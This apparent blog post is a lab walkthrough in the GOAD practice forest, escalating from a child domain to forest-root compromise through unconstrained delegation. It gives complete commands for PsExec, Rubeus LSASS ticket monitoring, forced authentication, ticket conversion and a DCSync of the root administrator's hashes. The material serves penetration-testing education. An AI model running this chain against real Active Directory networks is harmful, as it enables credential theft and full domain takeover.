Unconstrained Delegation

Published by Matt Clemons on

This post walks through a straight line from a child domain foothold to full forest root compromise using unconstrained delegation.

The first thing I want to know in a child domain is who is trusted to impersonate other principals.

impacket-findDelegation north.sevenkingdoms.local/eddard.stark:'P@ssword123!' \
  -dc-ip 192.168.66.11

I’m asking Active Directory to explain its trust decisions.

In this case, the output shows that WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL is configured for unconstrained delegation.

The Environment

This is a typical GOAD forest.

  • Forest root domain: SEVENKINGDOMS.LOCAL
    • DC: KINGSLANDING.SEVENKINGDOMS.LOCAL
    • IP: 192.168.66.10
  • Child domain: NORTH.SEVENKINGDOMS.LOCAL
    • DC: WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL
    • IP: 192.168.66.11

The objective is to extract the NTLM hashes for Administrator@SEVENKINGDOMS.LOCAL, the forest root administrator.

Unconstrained Delegation Is a Forest Killer

A server configured for unconstrained delegation caches Kerberos Ticket Granting Tickets for any client that authenticates to it. Those TGTs are stored in LSASS and can be reused to impersonate the original principal.

There is no domain boundary enforcement here.

If a forest root principal authenticates to a child domain server with unconstrained delegation, the forest root TGT is handed over. That is expected Kerberos behavior.

Setting up

Before you can capture anything, we need execution on Winterfell. Unconstrained delegation only matters if you can read LSASS on the delegated system.

From the child domain, that is trivial. eddard.stark has local admin on the child DC, so PsExec works.

impacket-psexec north.sevenkingdoms.local/eddard.stark:'P@ssword123!'@192.168.66.11

This drops you into a SYSTEM shell on WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL.

Nothing has been exploited yet. You are simply operating on infrastructure you already control.

Sit and Wait on LSASS

Upload Rubeus to Winterfell and start monitoring LSASS for inbound Kerberos tickets.

Rubeus.exe monitor /interval:5 /nowrap

This is passive. You are just waiting for something important to authenticate to you.

Make the Forest Root Talk to You

Now you need a forest root principal to authenticate to Winterfell. The simplest option is the forest root domain controller itself.

Logon to Kingslanding, then force an outbound SMB connection to Winterfell.

# On KINGSLANDING (192.168.66.10)
dir \\winterfell.north.sevenkingdoms.local\c$

Kingslanding’s machine account just sent its Kerberos credentials to Winterfell.

Capture the Forest Root TGT

Switch back to the Rubeus monitor on Winterfell.

You should now see a new ticket appear. Look closely at the principal. In GOAD, this reliably results in a TGT for Administrator@SEVENKINGDOMS.LOCAL landing in LSASS.

Copy the full Base64 encoded ticket blob.

Turn the Ticket into Access

On Kali, save the Base64 blob to a file and clean it up.

echo "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" > admin_parent.b64
tr -d '\n ' < admin_parent.b64 > admin_clean.b64

Decode it and convert it for use with Impacket.

base64 -d admin_clean.b64 > admin_parent.kirbi
impacket-ticketConverter admin_parent.kirbi admin_parent.ccache
export KRB5CCNAME=admin_parent.ccache

DCSync the Forest Root

Run DCSync directly against the forest root DC.

impacket-secretsdump -k -no-pass \
  -dc-ip 192.168.66.10 \
  SEVENKINGDOMS.LOCAL/Administrator@kingslanding.sevenkingdoms.local

Why This Works

Unconstrained delegation assumes the delegated system is fully trusted. That trust extends across domain boundaries inside a forest.

Once a forest root principal authenticates to that system, Kerberos does exactly what it is supposed to do. There is no exploit and no failure condition.

Categories: Security

0 Comments

Leave a Reply

Avatar placeholder

Your email address will not be published. Required fields are marked *

Related Posts

Security

Shadow Credentials

A lot of people hit DA and immediately reach for a Golden Ticket. That shows impact. It does not buy you time. In most environments, it does the opposite. Forged Kerberos artifacts are one of Read more

Security

Coercion to Domain Admin via ADCS Relay

This walkthrough shows how a single unauthenticated coercion flaw turned into full domain compromise in the ESSOS GOAD domain. No creds. No phishing. Just bad defaults and missing protections. Phase 1: Recon and Target Identification Read more

Security

GOAD Compromise Part 3: Total Forest Takeover

In Part 2, we gained SYSTEM on WINTERFELL and minted a long lived Golden Ticket for the child domain. We have total control of North, but in an Active Directory forest, the Child Domain is Read more